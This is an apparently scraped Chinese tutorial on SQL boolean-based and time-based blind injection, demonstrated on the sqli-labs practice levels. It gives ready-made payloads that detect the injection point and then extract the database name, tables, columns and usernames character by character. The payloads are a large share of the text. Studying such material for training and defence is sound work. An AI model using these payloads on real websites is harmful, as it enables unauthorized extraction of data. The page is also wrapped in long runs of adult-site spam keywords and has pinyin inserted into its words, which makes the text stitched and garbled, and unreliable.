成人在线亚洲_国产日韩视频一区二区三区_久久久国产精品_99国内精品久久久久久久

您的位置:首頁技術(shù)文章
文章詳情頁

SQL bool盲注和時(shí)間盲注詳解

瀏覽:315日期:2023-03-06 14:25:14
目錄
  • 一、bool盲注和時(shí)間盲注常用函數(shù)
  • 二、bool盲注和時(shí)間盲注payload
    • 1、SQL注入點(diǎn)探測(cè)
    • 2、猜解數(shù)據(jù)庫名
    • 3、猜解表名
    • 4、猜解字段名
    • 5、猜解數(shù)據(jù)

今天繼續(xù)給大家介紹Linux運(yùn)維相關(guān)知識(shí),本文主要內(nèi)容是SQL bool盲注和時(shí)間盲注。

免責(zé)聲明:
本文所介紹的內(nèi)容僅做學(xué)習(xí)交流使用,嚴(yán)禁利用文中技術(shù)進(jìn)行非法行為,否則造成一切嚴(yán)重后果自負(fù)!
再次強(qiáng)調(diào):嚴(yán)禁對(duì)未授權(quán)設(shè)備進(jìn)行滲透測(cè)試!

一、bool盲注和時(shí)間盲注常用函數(shù)

1、休眠函數(shù)
sleep()是SQL語句中用于休眠的函數(shù),時(shí)間盲注中常用,sleep(x)可以讓程序休眠x秒。
2、字符串截取函數(shù)
字符串截取函數(shù)是bool盲注和時(shí)間盲注中都需要使用的函數(shù)。常用的字符串截取函數(shù)有mid()、substr()、left()。
mid()函數(shù)格式為:

mid(【目標(biāo)字段】,【開始的位置】,【截取長度】)

其中,開始的位置默認(rèn)從1開始。
substr()函數(shù)的用法與mid相似,left函數(shù)則默認(rèn)從字段的最左邊開始截取,其格式為:

left(【目標(biāo)字段】,【截取長度】)

表示從目標(biāo)字段的左邊開始截取指定長度的字符。
3、字符串長度函數(shù)
字符串長度函數(shù)length()會(huì)應(yīng)用在SQL bool盲注和時(shí)間盲注中,length()函數(shù)可以反饋目標(biāo)字符串的長度。
4、ascii碼轉(zhuǎn)換函數(shù)
ascii碼轉(zhuǎn)換函數(shù)可以將一個(gè)字符轉(zhuǎn)換成ascii碼,在SQL基于時(shí)間的盲注和基于bool的盲注中,ascii碼轉(zhuǎn)換函數(shù)可以將一個(gè)字符轉(zhuǎn)換成其ascii碼值。常用的ascii碼轉(zhuǎn)換函數(shù)為ascii()、ord()。
5、條件判斷函數(shù)
條件判斷函數(shù)if是SQL時(shí)間盲注中的必用函數(shù),可以利用if函數(shù)來根據(jù)條件來反饋不同的結(jié)果。
if函數(shù)格式如下所示:

if(【條件】,【值1】,【值2】)

當(dāng)條件成立時(shí),if函數(shù)返回值1,當(dāng)條件不成立時(shí),if函數(shù)返回值2.

二、bool盲注和時(shí)間盲注payload

1、SQL注入點(diǎn)探測(cè)

我們使用sqli_lab的靶場(chǎng),對(duì)基于bool的盲注和基于時(shí)間的盲注進(jìn)行講解,在sqli_lab靶場(chǎng)中,基于bool的盲注是第8關(guān),基于時(shí)間的盲注是第9關(guān),頁面如下所示:

對(duì)于bool類型的盲注,我們可以通過執(zhí)行以下payload來探測(cè)是否存在注入點(diǎn):

id=1"and 1=2#

如果顯示異常,那么就說明and后面的內(nèi)容被成功執(zhí)行,因此可能存在bool類型的SQL注入。
對(duì)于時(shí)間類型的盲注,我們可以通過執(zhí)行以下payload來探測(cè)是否存在注入點(diǎn):

id=1"and sleep(10)#

如果網(wǎng)頁反應(yīng)時(shí)間出現(xiàn)了明顯延遲,就說明存在基于時(shí)間的SQL注入。

2、猜解數(shù)據(jù)庫名

bool類型的盲注猜解數(shù)據(jù)庫長度payload如下所示:

id=1"and length(database())>10#

時(shí)間類型的盲注猜解數(shù)據(jù)庫長度payload如下所示:

id=1"and sleep(if(length(database())>10,10,1))>10#

bool類型的盲注猜解數(shù)據(jù)庫名稱payload如下所示:

id=1"and ascii(mid(database(),1,1))>115#

時(shí)間類型的盲注猜解數(shù)據(jù)庫名稱payload如下所示:

id=1"and sleep(if(ascii(mid(database(),1,1))>115,10,1))#

上述四個(gè)payload,length函數(shù)用于反饋查詢結(jié)果的長度,mid函數(shù)用于截取查詢結(jié)果的指定字符,ascii函數(shù)用于將其轉(zhuǎn)換為ascii碼的形式,if函數(shù)中第一個(gè)參數(shù)為一個(gè)判斷表達(dá)式,本質(zhì)上是bool類型盲注的核心,后面的10和1分別為表達(dá)式成立或者不成立條件下的返回值,該返回值為sleep函數(shù)的輸入,以此就可以控制網(wǎng)頁反應(yīng)的時(shí)間。

3、猜解表名

bool類型的盲注表名個(gè)數(shù)猜解payload如下所示:

id=1"and (select count(*) from information_schema.tables where table_schema=database())>2#

時(shí)間類型的盲注表名個(gè)數(shù)猜解payload如下所示:

id=1"and sleep(if((select count(*) from information_schema.tables where table_schema=database())>2,10,1))#

bool類型的盲注表名猜解payload如下所示:

id=1"and ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100#

時(shí)間類型的盲注表名猜解payload如下所示:

id=1"and sleep(if((ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100),10,1))#

在上述4個(gè)payload中,其原理與之前介紹的相似,但是是使用limit函數(shù)來不斷的控制反饋的變量。

4、猜解字段名

bool類型的盲注字段名個(gè)數(shù)猜解payload如下所示:

id=1"and (select count(*) from information_schema.columns where table_name="users"and table_schema=database())>1#

時(shí)間類型的盲注字段名個(gè)數(shù)猜解payload如下所示:

id=1"and sleep(if((select count(*) from information_schema.columns where table_name="users"and table_schema=database())>1,10,1))#

bool類型的盲注字段名個(gè)數(shù)猜解payload如下所示:

id=1"and ascii(mid((select% column_name from information_schema.columns where%20table_name="users"and table_schema=database() limit 0,1),1,1))>1000#

時(shí)間類型的盲注字段名個(gè)數(shù)猜解payload如下所示:

id=1"and sleep(if(ascii(mid((select% column_name from information_schema.columns where%20table_name="users"and table_schema=database() limit 0,1),1,1))>1000,10,1))#

其原理與之前類似。

5、猜解數(shù)據(jù)

bool類型的盲注數(shù)據(jù)長度猜解payload如下所示:

id=1"and (select count(*) from users)>1#

時(shí)間類型的盲注數(shù)據(jù)長度猜解payload如下所示:

id=1"and sleep(if((select count(*) from users)>1,10,1))#

bool類型的盲注數(shù)據(jù)猜解payload如下所示:

id=1"and ascii(mid((select username from users limit 0,1),1,1))>1#

時(shí)間類型的盲注數(shù)據(jù)猜解payload如下所示:

id=1"and sleep(if(ascii(mid((select username from users limit 0,1),1,1))>1,10,1))#

到此這篇關(guān)于SQL bool盲注和時(shí)間盲注詳解的文章就介紹到這了,更多相關(guān)SQL bool盲注和時(shí)間盲注內(nèi)容請(qǐng)搜索以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持!

標(biāo)簽: MsSQL
成人在线亚洲_国产日韩视频一区二区三区_久久久国产精品_99国内精品久久久久久久
久久精品欧美日韩| 久久亚洲高清| 国产在线观看一区| 日本久久一区二区三区| 国产欧美综合色| 精品一区二区三区免费| 国产精品mm| 91精品国产福利| 天天色图综合网| 悠悠资源网久久精品| 欧美性xxxxx极品少妇| 亚洲乱码精品一二三四区日韩在线| 成人免费视频caoporn| 亚洲综合不卡| 国产情人综合久久777777| 黄色精品一二区| 亚洲一区二区三区色| 久久久久久久久伊人| 国产综合久久久久久久久久久久| 国产精品久久亚洲7777| 亚洲免费观看高清完整版在线观看 | 99re热视频精品| 欧美美女网站色| 婷婷国产在线综合| 一区二区国产在线观看| 国产欧美综合色| 成人av免费在线播放| 欧美影视一区在线| 亚洲一区二区三区精品在线| 国产精品国产一区二区| 日韩一区二区三区免费看| 日韩avvvv在线播放| 国产精品一区视频网站| 亚洲美女在线一区| 韩日视频一区| 欧美国产日产图区| 成人app网站| 欧美日韩二区三区| 免费日本视频一区| 国产精品久久久久久模特| 亚洲婷婷综合色高清在线| 欧美久久在线| 国产日韩欧美精品一区| 成人av免费在线观看| 91精品蜜臀在线一区尤物| 久久99精品久久久久婷婷| 久久夜色精品| 日韩高清不卡一区二区| 国产日韩一区二区| 亚洲美女屁股眼交3| 国内精品福利| 国产精品乱人伦一区二区| 91蜜桃网址入口| 久久精品夜色噜噜亚洲a∨| k8久久久一区二区三区| 日韩欧美123| 成人午夜视频福利| 精品国产乱码久久久久久图片| 国产中文一区二区三区| 欧美丰满嫩嫩电影| 国产精品自拍av| 欧美吻胸吃奶大尺度电影| 天天综合天天综合色| 色婷婷精品大视频在线蜜桃视频| 日韩影视精彩在线| 色网综合在线观看| 极品少妇xxxx偷拍精品少妇| 欧美日韩不卡一区二区| 久久se精品一区精品二区| 91精品国产乱| 综合色天天鬼久久鬼色| 免费久久99精品国产自| 国产精品综合av一区二区国产馆| 中文字幕欧美日韩一区| 久久久亚洲一区| 国产精品一区二区久久精品爱涩| 久久一区二区三区国产精品| 亚洲国产精选| 蜜桃精品视频在线| 久久久久久久久伊人| 国产精品久久久久久久久久直播 | 国内精品亚洲| 全国精品久久少妇| 精品成人一区二区| 亚洲免费网址| 成人中文字幕在线| 亚洲乱码国产乱码精品精98午夜| 欧美综合久久久| 99精品1区2区| 亚洲国产人成综合网站| 日韩三级在线免费观看| 99在线精品视频在线观看| 老色鬼精品视频在线观看播放| 久久伊人中文字幕| 久久成人亚洲| 成人免费视频caoporn| 夜夜夜精品看看| 日韩一级片在线播放| 亚洲乱亚洲高清| 国产精品一二三区在线| 亚洲精品综合在线| 777久久久精品| 亚洲国产精品一区| 国产精品18久久久久久久久| 亚洲精品视频在线| 欧美电视剧在线观看完整版| 99精品国产99久久久久久福利| 久久99国产精品免费网站| 中文字幕精品一区二区三区精品 | 在线一区二区观看| 欧美一区久久| 精品一区二区三区免费毛片爱 | 精品在线播放免费| 亚洲精品videosex极品| 91精品欧美福利在线观看| 99精品欧美一区二区三区| 成人av电影免费在线播放| 天天做天天摸天天爽国产一区 | 婷婷一区二区三区| 国产精品素人视频| 69久久夜色精品国产69蝌蚪网| 亚洲看片一区| 成人一道本在线| 视频一区在线视频| 综合亚洲深深色噜噜狠狠网站| 欧美丰满少妇xxxbbb| 一区二区日韩免费看| 成人国产精品免费网站| 视频一区二区三区在线| 国产精品人人做人人爽人人添| 6080日韩午夜伦伦午夜伦| 香蕉久久夜色精品国产| 欧美日韩视频| 粉嫩aⅴ一区二区三区四区| 五月天激情综合| 亚洲欧美日韩系列| 精品99久久久久久| 欧美日韩在线免费视频| 亚洲国产精品毛片| 91视频观看免费| 国产精品一区二区x88av| 偷窥少妇高潮呻吟av久久免费| 一色屋精品亚洲香蕉网站| 欧美xxxx在线观看| 欧美三级视频在线| 久久精品官网| 日韩一级欧洲| av网站一区二区三区| 国产一本一道久久香蕉| 石原莉奈在线亚洲二区| 一区二区三区中文免费| 国产精品网站在线观看| 久久嫩草精品久久久精品一| 欧美一区二区三区系列电影| 欧洲中文字幕精品| 久久男女视频| 亚洲女同同性videoxma| 亚洲精品孕妇| 欧美日本一区二区高清播放视频| 成人蜜臀av电影| 国产精品99久| 国产乱色国产精品免费视频| 久久国产精品99久久久久久老狼| 婷婷亚洲久悠悠色悠在线播放| 一区二区三区在线视频观看| 国产精品的网站| 国产精品久久毛片av大全日韩| 国产精品天天看| 国产精品蜜臀在线观看| 日本一区二区不卡视频| 国产日韩视频一区二区三区| 26uuu国产电影一区二区| 日韩欧美国产电影| 日韩欧美亚洲国产精品字幕久久久| 欧美精三区欧美精三区| 欧美日韩免费电影| 欧美日韩一卡二卡三卡| 欧美日韩aaaaaa| 欧美丰满高潮xxxx喷水动漫| 欧美精品久久天天躁| 91麻豆精品国产自产在线观看一区| 欧美精品色一区二区三区| 在线播放欧美女士性生活| 69堂精品视频| 精品美女在线播放| 久久久青草青青国产亚洲免观| 久久这里只有精品视频网| 久久综合给合久久狠狠狠97色69| 久久综合久久综合久久综合| 久久夜色精品国产欧美乱极品| 久久亚洲一区二区三区明星换脸| 久久久久久久久久看片| 国产午夜精品一区二区三区嫩草| 日本一区二区三区国色天香| 国产片一区二区三区| 中文字幕不卡在线播放| 国产精品久久久一区麻豆最新章节| 亚洲欧美在线高清| 亚洲一二三专区| 奇米777欧美一区二区|